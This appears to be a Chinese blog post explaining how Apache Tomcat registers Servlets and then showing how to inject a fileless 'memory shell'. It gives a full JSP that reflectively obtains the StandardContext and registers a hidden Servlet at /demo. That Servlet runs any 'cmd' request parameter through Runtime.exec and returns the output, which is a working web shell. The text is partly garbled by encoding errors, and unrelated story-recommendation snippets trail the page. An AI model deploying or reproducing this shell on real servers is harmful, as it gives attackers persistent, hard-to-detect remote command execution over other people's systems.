java Servlet內(nèi)存馬

Servlet

web.xml

<?xml version="1.0" encoding="UTF-8"?>

<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"

? ? ? ? xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

? ? ? ? xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"

? ? ? ? version="4.0"

? ? ? ? metadata-complete="false"

>

? ? <!--注冊(cè)Servlet-->

? ? <servlet>

? ? ? ? <servlet-name>hello</servlet-name>

? ? ? ? <servlet-class>com.naihe2.testServlet</servlet-class>

? ? </servlet>

? ? <!--Servlet的請(qǐng)求路徑-->

? ? <servlet-mapping>

? ? ? ? <servlet-name>hello</servlet-name>

? ? ? ? <url-pattern>/hello</url-pattern>

? ? </servlet-mapping>

</web-app>

testServlet

package com.naihe2;

import javax.servlet.ServletException;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

public class testServlet extends HttpServlet {

? ? @Override

? ? protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

? ? ? ? resp.getWriter().write("123");

? ? }

? ? @Override

? ? protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

? ? ? ? doGet(req, resp);

? ? }

}

分析Servlet生成

讀取web.xml

ContextConfig#webConfig()

在這里對(duì)其xml文件進(jìn)行讀取

ContextConfig#configureContext()

遍歷webxml中的內(nèi)容,將內(nèi)容賦給新創(chuàng)建的Wrapper

將類(lèi)名添加到Wrapper

將Wrapper添加到context中

StandardContext.createWapper()

在這里添加映射關(guān)系杠输, 將 url 路徑和 servlet 類(lèi)做映射阁危。

加載Servlet

遍歷內(nèi)容,比添加到StandardContext的list中

這里判斷l(xiāng)oadOnStartup是否大于0,如果大于才會(huì)添加

standardWrapper中的loadOnStatup默認(rèn)為-1

在servlet的配置當(dāng)中端蛆,1的含義是:

標(biāo)記容器是否在啟動(dòng)的時(shí)候就加載這個(gè)servlet拓劝。

當(dāng)值為0或者大于0時(shí),表示容器在應(yīng)用啟動(dòng)時(shí)就加載這個(gè)servlet巢株;

當(dāng)是一個(gè)負(fù)數(shù)時(shí)或者沒(méi)有指定時(shí),則指示容器在該servlet被選擇時(shí)才加載熙涤。

正數(shù)的值越小阁苞,啟動(dòng)該servlet的優(yōu)先級(jí)越高困檩。

由于我們要注入內(nèi)存馬,且沒(méi)有配置xml不會(huì)在應(yīng)用啟動(dòng)時(shí)就加載這個(gè)servlet那槽,因此需要把優(yōu)先級(jí)調(diào)至1诈铛,讓自己寫(xiě)的servlet直接被加載

遍歷list驻民,加載wrapper

Servlet內(nèi)存馬

<%@ page import="java.lang.reflect.Field" %>

<%@ page import="org.apache.catalina.core.StandardContext" %>

<%@ page import="org.apache.catalina.connector.Request" %>

<%@ page import="java.io.IOException" %>

<%@ page import="org.apache.catalina.Wrapper" %>

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.BufferedInputStream" %>

<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<html>

? <head>

? ? <title>$Title$</title>

? </head>

? <body>

? <%

? ? HttpServlet httpServlet = new HttpServlet() {

? ? ? @Override

? ? ? protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

? ? ? ? InputStream is = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();

? ? ? ? BufferedInputStream bis = new BufferedInputStream(is);

? ? ? ? int len;

? ? ? ? while ((len = bis.read())!=-1){

? ? ? ? ? resp.getWriter().write(len);

? ? ? ? }

? ? ? }

? ? ? @Override

? ? ? protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

? ? ? ? super.doPost(req, resp);

? ? ? }

? ? };

? ? //獲得StandardContext

? ? Field reqF = request.getClass().getDeclaredField("request");

? ? reqF.setAccessible(true);

? ? Request req = (Request) reqF.get(request);

? ? StandardContext stdcontext = (StandardContext) req.getContext();

? ? //從StandardContext.createWapper()獲得一個(gè)Wapper對(duì)象

? ? Wrapper newWrapper = stdcontext.createWrapper();

? ? String name = httpServlet.getClass().getSimpleName();

? ? newWrapper.setName(name);

? ? newWrapper.setLoadOnStartup(1);

? ? newWrapper.setServlet(httpServlet);

? ? newWrapper.setServletClass(httpServlet.getClass().getName());

? ? //將Wrapper添加到StandardContext

? ? stdcontext.addChild(newWrapper);

? ? stdcontext.addServletMappingDecoded("/demo", name);

? %>

直接訪問(wèn)demo發(fā)現(xiàn)404

訪問(wèn)index.jsp注入內(nèi)存馬

再次訪問(wèn)demo

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子特石,更是在濱河造成了極大的恐慌撵孤,老刑警劉巖彻消,帶你破解...
    沈念sama閱讀 221,695評(píng)論 6 515
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件蛔趴,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡鳖藕,警方通過(guò)查閱死者的電腦和手機(jī)魔慷,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,569評(píng)論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門(mén),熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)著恩,“玉大人院尔,你說(shuō)我怎么就攤上這事『硖埽” “怎么了邀摆?”我有些...
    開(kāi)封第一講書(shū)人閱讀 168,130評(píng)論 0 360
  • 道士緝兇錄:失蹤的賣(mài)姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)伍茄。 經(jīng)常有香客問(wèn)我栋盹,道長(zhǎng),這世上最難降的妖魔是什么敷矫? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 59,648評(píng)論 1 297
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任例获,我火速辦了婚禮,結(jié)果婚禮上曹仗,老公的妹妹穿的比我還像新娘榨汤。我一直安慰自己,他們只是感情好怎茫,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,655評(píng)論 6 397
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布收壕。 她就那樣靜靜地躺著,像睡著了一般遭居。 火紅的嫁衣襯著肌膚如雪啼器。 梳的紋絲不亂的頭發(fā)上旬渠,一...
    開(kāi)封第一講書(shū)人閱讀 52,268評(píng)論 1 309
  • 城市分裂傳說(shuō)
    那天俱萍,我揣著相機(jī)與錄音,去河邊找鬼告丢。 笑死枪蘑,一個(gè)胖子當(dāng)著我的面吹牛损谦,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播岳颇,決...
    沈念sama閱讀 40,835評(píng)論 3 421
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼照捡,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了话侧?” 一聲冷哼從身側(cè)響起栗精,我...
    開(kāi)封第一講書(shū)人閱讀 39,740評(píng)論 0 276
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎瞻鹏,沒(méi)想到半個(gè)月后悲立,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,286評(píng)論 1 318
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡新博,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,375評(píng)論 3 340
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年薪夕,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片赫悄。...
    茶點(diǎn)故事閱讀 40,505評(píng)論 1 352
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡原献,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出埂淮,到底是詐尸還是另有隱情姑隅,我是刑警寧澤,帶...
    沈念sama閱讀 36,185評(píng)論 5 350
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布倔撞,位于F島的核電站粤策,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏误窖。R本人自食惡果不足惜叮盘,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,873評(píng)論 3 333
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望霹俺。 院中可真熱鬧柔吼,春花似錦、人聲如沸丙唧。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,357評(píng)論 0 24
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)想际。三九已至培漏,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間胡本,已是汗流浹背牌柄。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,466評(píng)論 1 272
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留侧甫,地道東北人珊佣。 一個(gè)月前我還...
    沈念sama閱讀 48,921評(píng)論 3 376
  • 代替公主和親
    正文 我出身青樓蹋宦,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親咒锻。 傳聞我的和親對(duì)象是個(gè)殘疾皇子冷冗,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,515評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容